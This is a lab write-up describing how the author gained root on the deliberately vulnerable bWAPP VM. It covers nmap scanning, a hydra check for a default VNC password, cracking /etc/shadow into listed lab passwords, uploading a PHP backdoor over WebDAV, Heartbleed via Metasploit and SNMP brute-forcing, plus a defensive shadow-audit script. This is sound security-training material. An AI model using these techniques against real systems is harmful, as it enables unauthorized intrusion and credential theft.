bWAPP Write-Up

This post contains the steps to get a root shell on the bWAPP VM.

Host discovery

As always, we need to discover where the machine is on our network. To do so, let’s use Nmap:

nmap -sP 192.168.1.1/24 

Fingerprinting

After getting the IP address (192.168.1.10), we need to do some fingerprinting.

nmap -sV 192.168.1.10

Fig. Nmap scan result

A lot of services were open, such as VNC, FTP, etc.

Having seen port 80 in the scan report, I decided to scan it with Nikto.

Fig. Nikto report on port 80 (HTTP)

Moreover, I decided to launch DirBuster to retrieve folders/documents.

Fig. Launching DirBuster on port 80

Finally, I checked the FTP service (ProFTPD 1.3) and was able to connect as an anonymous user. We only had access to a folder full of PDF documents.

Fig. Anonymous access on FTP Server

Thanks to the DirBuster results, I saw that the /webdav/ folder (accessible through HTTP) was the same folder we had been browsing during the FTP session.

Let's now talk about the exploitation.

Exploitation

### Exploiting VNC

I started by exploiting the VNC service, using Hydra to test the password:

hydra -p "password" 192.168.1.10 vnc

Fig. Checking that VNC uses default password

The output was clear: the password was the default one. We were able to connect using vncviewer and we were … r00t.

Fig. Root access through VNC

Then, I extracted /etc/shadow from the box.

I decided to crack it using John the Ripper (with the d4rkc0de.lst wordlist) and cracked 4 hashes:

Asgard           (thor)
bug              (bee)
bug              (root)
m00n             (selene)
trinity          (neo)

We could log in as root and had full access to the server.
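As an added example (not from the write-up), here is a small Python audit of a saved /etc/shadow that flags what made these hashes so easy to crack: MD5-crypt ($1$) hashes, passwords older than policy, and empty password fields. The sample lines and hash bodies are constructed placeholders.

```python
# Added example (not from the write-up): audit a saved /etc/shadow for what made the
# bee-box hashes quick to crack. Sample lines are constructed; hashes are placeholders.
import re
from datetime import date, timedelta

# crypt(3) format ids. $1$ (MD5-crypt, used on the VM) is fast to brute-force;
# SHA-crypt, bcrypt and yescrypt are the current choices.
HASH_IDS = {"1": "md5crypt", "2b": "bcrypt", "5": "sha256crypt",
            "6": "sha512crypt", "y": "yescrypt"}
WEAK_ALGOS = {"md5crypt"}
EPOCH = date(1970, 1, 1)
SAMPLE_SHADOW = """\
root:$1$SALTSALT$PLACEHOLDERMD5CRYPTHASH:15792:0:99999:7:::
daemon:*:13991:0:99999:7:::
mysql:!:15792:0:99999:7:::
alice:$6$SALTSALT$PLACEHOLDERSHA512HASH:19300:0:99999:7:::
guest::15792:0:99999:7:::
"""

def parse_shadow_line(line):
    """Split one entry into its 9 colon-separated fields and classify field 2."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"malformed shadow line: {line!r}")
    user, pw, lastchg = fields[0], fields[1], fields[2]
    m = re.match(r"^\$([^$]+)\$", pw)
    return {"user": user,
            "empty": pw == "",                    # logs in with no password
            "locked": pw.startswith(("*", "!")),  # no valid hash, nothing to crack
            "algo": HASH_IDS.get(m.group(1), "unknown") if m else None,
            "lastchg": int(lastchg) if lastchg else None}

def password_age_days(lastchg, today):
    """Field 3 is the day count since 1970-01-01 of the last password change."""
    return (today - (EPOCH + timedelta(days=lastchg))).days

def audit_shadow(text, today, max_age_days=365):
    """Return (user, finding) pairs for accounts that deserve a second look."""
    findings = []
    for line in filter(str.strip, text.splitlines()):
        e = parse_shadow_line(line)
        if e["empty"]:
            findings.append((e["user"], "empty password"))
        elif not e["locked"]:
            if e["algo"] in WEAK_ALGOS:
                findings.append((e["user"], f"weak hash algorithm {e['algo']}"))
            if e["lastchg"] is not None and password_age_days(e["lastchg"], today) > max_age_days:
                findings.append((e["user"], "password older than policy"))
    return findings
```

Run it against a copy of the real file with today's date to get the list of accounts an attacker with the shadow file would try first.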

### Exploiting WebDAV

As we saw, we have FTP access to a folder that is also served over HTTP, so we can upload a (PHP) backdoor.

Fig. Checking that Webdav was activated

Fig. Uploading our backdoor on the Server

The backdoor is then accessible in the /webdav folder.

Accessing it gives us a (limited) shell on the server, so it was not that interesting compared to the other vulnerabilities.

Fig. Executing commands with our Backdoor

### Exploiting Heartbleed

Everybody has heard about Heartbleed, and bWAPP ships a vulnerable version of OpenSSL. You can therefore practice the attack and try all the scripts that have been released on the internet.

Fig. Configuring Heartbleed on port 8443

Fig. Exploiting Heartbleed attack

For this experiment, I wanted to have fun with the Metasploit module, but try whichever one you prefer. You can also give it a try at stealing the private keys :-).

### Exploiting SNMP

The last step was to exploit the SNMP service. First, I brute-forced the logins (community strings) and found two (default) ones:

Fig. Bruteforcing SNMP Logins

Then, we queried the service to gather a lot of information, such as the computer name, the processes running on the system, etc. This is basically due to a default (and insecure) installation of the SNMP service.

Fig. Exploiting SNMP Service

### Thoughts

I only spent a few hours on the VM, and it contains a lot of (interesting) exercises to practice with. I exploited some of the flaws, but there are even more, so this write-up is not exhaustive.

Feel free to exploit this VM the way you prefer :-) Cheers,